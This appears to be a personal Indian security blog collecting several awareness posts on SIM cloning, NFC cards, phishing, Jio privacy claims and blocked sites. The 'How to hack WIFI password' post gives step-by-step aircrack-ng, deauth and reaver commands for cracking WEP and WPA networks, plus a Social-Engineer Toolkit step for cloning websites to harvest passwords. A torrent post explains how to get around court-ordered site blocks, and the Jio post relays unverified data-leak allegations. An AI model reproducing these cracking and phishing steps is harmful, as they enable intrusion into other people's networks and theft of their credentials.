Saturday, August 10, 2019

FOLLOW UP ON CYBER CRIMES AND CYBER FRAUDS AWARENESS SEMINAR.

Before we start, we forgot to mention this at the seminar, please mail anything to " awareness@dfcsecurity.co.in " to get an automated response with some links with a privacy kit which you should definitely read, and that is not as technical as this post is. Do it now, we will take that email ID down soon.
FOLLOW UP ON CYBER CRIMES AND CYBER FRAUDS AWARENESS SEMINAR.
Thanks to Mr. Zafar Ajmal Kidwai (IPS) SP KPD and Mr. Amandeep Jakhu(IPS) Addl. SP for taking this initiative, we have a long way to go and we will.
Here's some clarification about yesterday's awareness seminar held by Krishnanagar Police District and answer to some question people asked me later, but first of all I would like so say that I am more of a research guy with social anxiety and that was my first stage presentation, but the main problem was we had limited time, that's why I had to brainstorm through some of the key points which finally ended up like an information soup, as the time was limited I was constantly drifting off of my track and topic, that's what caused the confusion among the people.
So the first question we got was, "Can my SIM Card be cloned?"
And the answer is YES, but there is no point in cloning a SIM Card so let's get a bit technical here and see why, First of all, SIM (Subscriber Identity Module) Card has a 64 bit stored data called IMSI (International Mobile Subscriber Identity) and an authentication key. If you put a SIM card in a mobile it sends the IMSI and Authentication key to the nearest cellular tower and the service provider uses a random number and the key to generate a new number and the random number is sent back to the mobile and it binds with the key again and if these two keys add up then "you're connected" now in sim cloning, you need the victim's SIM Card physically to copy the IMSI and Key to a new blank SIM Card, but it used to work in CDMA and in some cases you could use both of the SIMs at the same time, it doesn't work much in GSM and the ICCID of the original SIM card often causes connectivity issues in roaming.
Then some people got confused when I forbade them to use NFC enabled Credit/Debit Card but suggested them to use virtual wallets like Google pay, I could not demonstrate how NFC Hacking works on open stage because in the past I have seen cases where some specific crime rate increased after someone demonstrated on open stage and I request all of my fellow cyber security experts and cyber criminals to keep your knowledge to yourself and don't show off like kids, the cyber crime rate has already increased.
Now the NFC, here's the deal with contact less VISA Card, and I am concerned from the day one about this, here I am going to describe why going "card less" is a better idea if you follow these steps.
1. Your Credit/Debit card has an embedded NFC (RFID) chip which typically generates different unique identification code to which theoretically promises security ( but there are some bottlenecks) and usually if you are using that card with a genuine payment portal you have to place the card within 4cm of the device, which also promises security but an attacker uses a high power antenna to sniff one UIC and he can take out up-to 2000 INR without any PIN.
2. If your wallet gets stolen, or if you drop your wallet somewhere, same thing happens, the criminal can spend up to 2000 INR in any departmental store without any PIN.
But in the case of using any wallet like Samsung Pay, Google Pay and Apple Pay is relatively safer, here's why.
Samsung Pay: Samsung pay has NFC and Magnetic Secure Transmission ( which is the most insecure part about it, it simulates the magnetic strip of a card in case the terminal has no NFC.
Apple Pay is the most secure among these as it uses bio-metric authentication if you need to process a payment, and Google pay also needs pin or bio-metric in tap to pay and sometimes it goes crazy and asks for your Google Password which is OK, and Google's Browser payment needs your card's CVV/CVC, and I would always suggest to go for Card Number and CVV Combination instead of Card number and Pin combination in any other payment gateway as well.
So the bottom line is if you secure your phone with a lock screen and don't use any malicious app or watch "educational videos" on your phone which is the worst thing you could do to get your personal stuff stolen, then you are safe, *geek alert* Google Pay doesn't work on Rooted Device (even on systemless root) unless you are an ADB wizard.
And if you decide to use your card after all that I said, wrap your card with a piece of aluminium foil and you are good to go. Sometimes too much paranoia cause problems, if you call your bank, they might ask last 4-6 digits of your Debit/Credit card for verification purposes, this much information won't cause any damage but try to negotiate by providing other personal information like Name and DOB, they usually ask this if you call to unblock your blocked credit card or activate a new one, and since you are calling them, check the number twice and only call the number mentioned in the back of your card.
Now I want to share a trick where you can feed your curious minds and stay safe from malicious links, most of the criminals out there use bit.ly to shorten a malicious URL, but hold on, you can copy the URL, paste it in the browser and simply place a "+" sign after the URL, it will show the content without opening the link.
And again, some of those "educational video" sites out there used to use ads to generate revenues, but since we use ad blocker they had to find out another way to generate revenue, and not only those sites, if you ever feel like your laptop fan cranked up after you open a site or your phone is heating up, chances are the site is running some JavaScript to mine cryptocurrency using your CPU/GPU power while you are on that site, this is not a potential threat but can cause your laptop/phone battery run out soon and the lifespan of the device also shortens ( I would give a live demo if we hold a seminar next time, and this can even happen if you connect to a random WiFi router and there is an attacker in the same network. Do not connect to any random access point, always use your own WiFi and also check it if someone has broken into time to time.
The last and very important point is, some of you think that if you make an account anywhere and feel threatened you should abandon that account, that's not the way you should handle things, denial is not the key here, if you abandon an old account someone can steal some public data from that account to make a new account and pretend to be you, so I would suggest that you should stay connected at least. Even if someone does such things some of your friends still might identify your real account and aware you about the same.
And do not make an account with a fake name, if someone makes an account with your real name and that person has access to any of your identity card somehow then chances are you'll have to face issues to ban him/her from spoiling your reputation and your real account might also get banned if you can't submit any document that matches the name and any of your pictures, this kind of thing happened before, and real account with fake names are the first target of fake account creator.
And remember, I have personally tried all of the above and these are not just based on theory.
DO NOT POST ANY PHOTO WHILE YOU ARE AWAY FROM HOME, AND DO NOT GEOTAG, THIS IS VERY IMPORTANT, IF YOU ARE AWAY FROM HOME IT CAN CAUSE BREAK INS IN YOUR HOME AND THIS IS A VERY COMMON THING THAT HAPPENS, ALWAYS POST YOUR VACATION PICTURES AFTER YOU RETURN.
There were several questions but I cannot cover them all in the same post, if you have any specific query, please mail me at ceo@dfcsecurity.co.in, and in case of any emergency contact the Police first. And if by any chance your report gets delayed please don't criticize the Police, they are trying their best to protect us all, we are getting so many cases that every single person involved is overwhelmed, and it takes time to wrap each of them properly, give them time, and they will obviously help you.
Agnidhra Chakraborty, (C|EH, ECSA, C|HFI, L|PT MASTER)
CEO, DFC Security.

Monday, October 24, 2016

Stop using Reliance JIO right now

Reliance Jio got 16 Million customer within 26 days and getting nearly 1.1 million new customer daily, Jio is supplying 16000 Tera bytes of data everyday which is the highest amount of data Supplied by a service provider, where vodafone supplies 6000 Tera Bytes of data and China mobiles supply 12000 TB of data Daily, how can a service provider supply this large amount of data daily for free? Try to understand something is terribly wrong


As per Anonymous India (@readteamin):
  Reliance Jio is sharing call data with advertisers. After the commercial launch of Jio services on 5 September, this accusation will add to the woes of the newest network provider in the market.
Last year, Anonymous India wrote a blog post citing security flaws in the Reliance Jio chat app. The post claims that the company used no encryption to transfer messages, so it was vulnerable to attacks from hackers. 
The latest revelation by Anonymous India suggests that call data from Jio apps are going to servers situated in USA and Singapore. Additionally, the data is being shared with an advertiser called Mad-Me





On its website, Anonymous also provided a step outline of how call data can be diverted to the advertiser.
1. Download and install Burp Suite (free edition) which is a security monitoring tool for applications.
2. Configure your Android device to send the traffic via Burp Suite.
3. Download My Jio app and the Jio dialer application from Google Play store.
4. Start capturing and keep intercept off.
5. Go to My Jio app and let it update.
6. Go to home and use native dialer to make calls.
7. Calling data is sent on random interval to app.cobal.mad-me.com from mobile, for fast result close all apps and open native dialer again.
8. You will get the packet being sent in proxy history.
After the launch, Jio is confronting a scarcity of SIMs because of high demand. Often, there are long lines outside Reliance digital stores. Reliance is also facing strong resistance from other telcos in giving it adequate interconnection points for calls.
Currently, Jio customers are experiencing heavy call-drops. On an average, the Jio network is seeing almost 12 crore call drops to other networks every day.
I, Agnidhra Chakraborty, as an Ethical Hacker and a citizen of India request you to stop using JIO sims for the safety of youself and your country. Keep it in your mind that these informations can be sold in deepweb against a large amount of Bitcoins, and I think Deepweb is not a perfect place where your private informations should be.

#OpStopReliance
This content is not purely original and does not bear any kind of copyright
THIS BLOG IS MEANT FOR EDUCATIONAL PURPOSES ONLY AND NEVER PROMOTES HACKING, SPAMMING PHISHING AND ANY KIND OF ILLEGAL JOBS, IF YOU ARE NOT A PROFESSIONAL DON'T EVEN THINK OF TRYING THESE. I PERSONALLY AM NOT RESPONSIBLE IF ANYTHING HAPPENS WITH YOU WHILE DOING THESE WORKS.
                                                                        Email:agnidhrashim@gmail.com
                                                                       Call me : 9735689898

Tuesday, September 20, 2016

Beware of this facebook virus

Since many days I have been watching there is a video link of some individual in facebook which is tagged by some of their friends saying this is your video and this is some kind of spoof runs on an individual's facebook profile, never open that link and this is a virus generated by hackers and this uses the individual's profile picture that looks damn legitimate If you click that video, your contacts on Facebook are automatically scanned by the virus and it automatically sends a similar link to all your friends on Facebook.
This is like a chain video and it will grip anyone and everyone who clicks the video.
If something similar has happened to you, immediately alert all your friends or contacts on Facebook to not open the video. This way you can stop spreading the virus further.
How to identify the virus?
The video generally comes in this file format : http://rigvtl1f.latestnewstodays.com
It uses your pic, profile pic, etc
It tags your friends automatically
Immediately alert your friends if you see such video being posted from your timeline
How to get rid of it if you have already opened it?
Go to your activity log and delete all these posts
Remove all the suspicious apps from your Facebook profile
Clear your browser, cache and cookeis and get rid of all malicious history
Check your Desktop for any virus and scan it through your antivirus

Monday, August 22, 2016

Fake Report

If you were to believe the recent reports, you might have landed in jail for visiting a banned website or downloading a torrent. Actually, the jail sentence and the penalty of $4,500 was for a specific case for a recently released Bolloywood movie, Dishoom.
Recent media reports that one could now get three-year jail sentence as well as a fine of $4,500 for trying to visit URLs blocked by the Indian government spread like wildfire creating frenzy among the people in India in the last 24 hours.
However, there is something you should know the next time you use a proxy site or a VPN (virtual private network) to open a torrent site.
“Visiting any website, even if it is a blocked site is not illegal either under the provisions of the Copyright Act, 1957 or the Information Technology Act, 2000,” says Prasanth Sugathan, Counsel at the Software Freedom Law Centre India, a registered society that works on the intersections of law and technology. “The only exception could be if a person views child pornography.”
“Torrent sites are often used to share free and open source software and literary and artistic work licensed under Creative Commons licenses,” Sugathan adds.
So, what are the actual details that prompted the reports to float around? The issue is likely due to the John Doe orders that Indian courts are issuing at regular intervals at the request of content creators like Bollywood film makers. The lawyers of film studios often approach courts ahead of a movie’s release seeking preventive blocks on the URLs they compile in the list. IP law publication SpicyIP reported about an order from the Mumbai High Court four days ago while dealing with an anti-piracy application on behalf of the newly-released film Dishoom.
The court ruled in the case that ISPs (internet service providers) should deliver a special message with information about the provisions of the Copyright Act, along with the order in question and the suit number, instead of just displaying the standard message that says the website is being blocked.
As a result of this special message, the people would be aware as to why a page was being blocked. However, this gave rise to question that if pages are being extensively blocked because a movie studio wants to do so, then shouldn’t the people be provided the reason for the block?
To which, Tata responded to the court order saying that individually putting up special information for all the websites blocked is not technologically possible for them. As a result, the court allowed for a special compromise by providing the text that has been going viral across the internet in the last few hours. However, the below message are only seen by users of Tata’s service, which also explains why none of the other ISPs are displaying this message.
“This URL has been blocked under the instructions of the Competent Government Authority or in compliance with the orders of a Court of competent jurisdiction. Viewing, downloading, exhibiting or duplicating an illicit copy of the contents under this URL is punishable as an offence under the laws of India, including but not limited to under Sections 63, 63-A, 65 and 65-A of the Copyright Act, 1957 which prescribe imprisonment for 3 years and also fine of upto Rs. 3,00,000/-. Any person aggrieved by any such blocking of this URL may contact at urlblock@tatacommunications.com who will, within 48 hours, provide you the details of relevant proceedings under which you can approach the relevant High Court or Authority for redressal of your grievance.”
To put in context, the message displayed above talks simply of illegal viewing of the copyrighted materials. Opening or browsing a pirate website will not send you to jail other than some sneaky malwares infecting your system. Having said that, could illegally downloading content land you in jail? Yes, most definitely, as per the Copyright Act about piracy which has been around for a long time now, but has rarely been enforced.
THIS BLOG IS MEANT FOR EDUCATIONAL PURPOSES ONLY AND NEVER PROMOTES HACKING, SPAMMING PHISHING AND ANY KIND OF ILLEGAL JOBS, IF YOU ARE NOT A PROFESSIONAL DON'T EVEN THINK OF TRYING THESE. I PERSONALLY AM NOT RESPONSIBLE IF ANYTHING HAPPENS WITH YOU WHILE DOING THESE WORKS.

- AgnidhraChakraborty©
                                                                                            http://agnidhrashim.wix.com/ethical-hacker
                                                                        Email:agnidhrashim@gmail.com
                                                                       Call me : 9735689898

Sunday, August 7, 2016

How to access TORRENTZ.EU, KAT.CR and other blocked torrent sites

For some people the title of this is quite exciting, and for some it is not, ok so let's jump into the topic, one of the most popular meta search engine torrentz has bade goodbye to his millions of user, It was founded in 2003 and served us for 13 years, but unexpectedly on 5/08/2016 it shut down unexpectedly, saying an emotional goodbye message "Torrentz will always love you. Farewell."


This is too much painful for torrent lovers but you know what, you don't have to take any kind of stress while I am here, so you wanna know how you can open torrentz again and download stuffs from it, ok in this blog I, Agnidhra Chakraborty shall describe how anyone can access TORRENTZ.EU step by step.

So, Let's start

First of all TORRENTZ is closed, so what you have to do is go back to the past and search your torrent, yes you have to time travel, now you may think that I have gone crazy but I have not, you can go, every webpage in the internet has a cached version of it, let's assume you want to visit a website on a specific date, so you have to search for the cached page of that site, there is an awesome tool available in the internet, it is called WAYBACKMACHINE and you can check out any site for it's old version just like torrentz.eu http://archive.org/web/ is the link where you can write an URL in the box provided and search for that

As you can see there are lots of sky blue bubbles in the calendar, now you have to click any of these available bubbles like I have clicked on 9th of july, so let's see what happens here, 
So, this is the torrentz cached page from 9th of july, now I am gonna search a torrent here and show you what happens
Here I have searched for 8 mile and you can see the results are here in front of your eye now I will click on one of those links to see what happens

As you can see it has redirected me to the torrent download site's page and you can download any torrent from here and as all of us know that KAT.CR is also banned I am going to download the torrent from KAT.CR itself, and here it is


And as you can see I am now easily able to download any torrent from any site no matter it is active or not but unfortunately we may not get future or latest torrents from here but it is useful for any purpose

IN INDIA, DOWNLOADING TORRENT IS ILLEGAL AND I DON'T PROVOKE ANYONE TO DOWNLOAD TORRENT FROM ANY SITE AS OUR HONORABLE SUPREME COURT HAS BANNED THIS SITE, THIS BLOG IS MEANT FOR EDUCATIONAL PURPOSES ONLY AND NEVER PROMOTES HACKING, SPAMMING PHISHING AND ANY KIND OF ILLEGAL JOBS, IF YOU ARE NOT A PROFESSIONAL DON'T EVEN THINK OF TRYING THESE. I PERSONALLY AM NOT RESPONSIBLE IF ANYTHING HAPPENS WITH YOU WHILE DOING THESE WORKS.

THIS CONTENT IS NOT MEANT TO COPY ©, THIS IS MY RESEARCH WORK SO SUPPORT ME, DON'T STEAL MY IDEAS

                                                                                                                      - AgnidhraChakraborty©
                                                                                            http://agnidhrashim.wix.com/ethical-hacker
                                                                        Email: agnidhrashim@gmail.com
                                                                       Call me : 9735689898




Monday, July 25, 2016

How to hack WIFI password

In the previous blog I described some DO's and DONT's and today I am gonna show you how to crack a WIFI password, but do not try this if you are not an Ethical Hacker or a Cyber Security Expert, this is illigal to hack into someone's WIFI and I am not responsible if anything goes wrong with you while doing this.

So. let's start:



You need some basic concept about computer and have a Linux Operating System for the work, Kali linux, Caine linux, Backbox, Deft linux, KNOPPIX, Parrot Security OS, Pentoo, WIFI sslax and WIFI way gets the work done but I personally prefer to use Kali Linux
-------------------------------------------------------------------------------
WEP
-------------------------------------------------------------------------------
open command terminal

airmon-ng start wlan0 (press enter after each line)

airodump-ng mon0

let load untill you see several wifi signals. then pres ctrl+c to stop it

copy numbers to the left and make note of the channel #

airodump-ng -w derp -c (channel number here) --bssid (copied number here) mon0

open new terminal window

aireplay-ng -1 0 -a (copied number here) mon0

open new terminal window

aireplay-ng -3 -b (copied number here) mon0

wait for 10 minutes

open new terminal window

aircrack-ng derp-01.cap
-----------------------------------------------------------------------------
WPA/WPA2 version 1
-----------------------------------------------------------------------------

apt-get update

apt-get install reaver

airmon-ng start wlan0

airodump-ng mon0

let load untill you see several wifi signals. then pres ctrl+c to stop it

reaver -i mon0 -b (copied number here) -vv
-----------------------------------------------------------------------------
WPA/WPA2 version 2
-----------------------------------------------------------------------------
open folder containing darkc0de.lst - copy and paste to the 

open command terminal

airmon-ng start wlan0 

airodump-ng mon0

let load untill you see several wifi signals. then pres ctrl+c to stop it

copy numbers to the left and make note of the channel # and essid (name on right)

airodump-ng -w -c (channel number here) -w herp --bssid (copied number here) --ivs mon0

open new terminal window

aireplay-ng -0 1 -e (essid name here) mon01

once you have handshake

open new terminal window

aircrack-ng -w /root/Desktop/darkc0de.lst herp-01.ivs
-----------------------------------------------------------------------------
get usernames and passwords
-----------------------------------------------------------------------------

open terminal

cd /pentest/exploits/set

./set

type in whatever website you want to clone

Even you can use WIFITE in terminal or fern wifi cracker or various wifi hacking tools available in Kali Linux,

Stay safe and again DO NOT TRY THESE TOOLS IF YOU ARE NOT A PROFESSIONAL

EDUCATION PURPOSES ONLY

                                                                                                                     - AgnidhraChakraborty
                                                                                            http://agnidhrashim.wix.com/ethical-hacker
                                                                        Email: agnidhrashim@gmail.com
                                                                       Call me : 9735689898

Friday, July 22, 2016

Some DO's And DONT's

So in the previous blog I described how to stay safe while using a WIFI router and today before starting another topic I will describe you how hackers can hack into your personal data and steal those and I will describe some Do's and Dont's in this blog.

Let's start:

1. Think before you click: Sometimes all of us face some problems while surfing internet, the problem is annoying advertisements. Those advertisements say that "Congratulations, you have won an iPhone 6S Gold, claim your reward here" or "Check this deal out, Samsung Galaxy S7 @ Rs.1 only for you, click here to know more." and I suggest you to never click that even if you find that much more tantalizing than anything, even sometimes you get an E mail from a reputated company like Cocacola or BMW saying that you have won a promo or a lottery amounting 1000000000 great Britain pound and to claim the reward please submit your Name, Age, Date of Birth along with your Bank Account Details and even your ATM pin or CVV, never bother to reveal your bank details or even any of your personal details to them, they are not from Cocacola or BMW, they are frauds who are trying to take all your money away and convert them to bitcoins and even you cannot realize that you are being a loser. Those mails are called Spamwares, even sometimes they contain a trojan like "Netbus" or something that can cause some serious issues. Or even worse can happen, you have to pay some ransom to the hackers to gain access to your own personal files, yes it is true, the malwares called ransomwares, so never click on a link without thinking what can happen in future.


This is the example of a phising E-Mail sent to me from some hackers

2.Beware of Fake Websites: Sometimes you may fall in a trap set by hackers, phissing sites, these sites are very similar to the original site but these contain some grammatical errors, low resolution images and even the url of these sites are quite different to the original website. So before logging into a website always check the URL for spelling mistakes or grammatical errors.

3.Install a Firewall: Though Microsoft provides a free firewall for Windows you should download an external firewall and I prefer Zone Alarm for that purpose, it is a lightweight free and secure firewall.

4.Online shopping and Online payment: Don’t shop on a site unless it has the “https” and a padlock icon to the left or right of the URL. Also, protect yourself and use a credit card instead of a debit card while shopping online—a credit card company is more likely to reimburse you for fraudulent charges.
Use a card of such bank which will ask for OTP and send you the SMS of the transaction along with the amount and the recipient's details.

5.Final precautions: Never use a cracked software, never use Torrent for downloading and use a genuine version of your operating system ams never use KMS pico, Remove wat and such softwares for activation and finally keep all your softwares Drivers, antivirus and Operating System updated to it's latest version.